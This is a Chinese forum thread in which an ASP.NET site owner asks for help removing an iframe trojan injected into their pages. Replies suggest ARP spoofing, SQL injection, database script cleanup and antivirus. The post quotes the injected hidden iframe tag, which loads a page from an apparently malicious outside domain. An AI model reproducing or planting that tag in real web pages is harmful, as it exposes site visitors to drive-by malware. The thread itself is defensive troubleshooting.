MD,网站被挂了IFrame木马

昨天刚发现网站开头被挂了IFrame木马,<iframe src=http://z.wokao1.cn/w14.htm?u=0888 width=100 height=0></iframe>

上服务器查看源文件，并没有看到IFrame文件， google下，说是有可能木马修改了iis配置文件，上了MetaBase.xml配置文件查看了一翻，没有发现异常,

同志们帮助看看，还有没有招 --------------------编程问答-------------------- 查毒杀毒啦。。 --------------------编程问答-------------------- 1 看下 iis 网站-属性-文档页  启用文档脚本被选上
具体看看
http://blog.csdn.net/huwei2003/archive/2008/12/10/3490755.aspx
2 检查js,或者图片文件(假图片) --------------------编程问答-------------------- 不是这个问题

iis 网站-属性-文档页  启用文档脚本被选上 --------------------编程问答-------------------- 你的情况很可能是机房内的主机搞arp攻击造成的，你可以在服务器上装个360arp防火墙什么的，或者联系你的主机空间商，让他们解决... --------------------编程问答-------------------- 看看你的数据库字段里有没有<script>类似的东西，有的话清楚一下、 --------------------编程问答-------------------- 这种好像都是sql注入的。 --------------------编程问答-------------------- 同意楼上的说法。
我也遇见过这样的

还有一种是arp欺骗也有可能，现象是：就你的机器访问才是这样的，别的局域网网的机器访问不是这样。 --------------------编程问答-------------------- 关注，换个好点的杀毒软件 --------------------编程问答-------------------- 应该是sql注入！
少使用字符串拼接的方式！ --------------------编程问答-------------------- 可怕！空间服务商解决

补充：.NET技术 ,  ASP.NET